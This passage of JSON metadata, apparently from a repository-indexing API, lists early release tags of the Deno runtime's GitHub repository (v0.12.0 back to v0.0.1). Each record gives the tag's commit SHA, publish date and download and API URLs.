0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0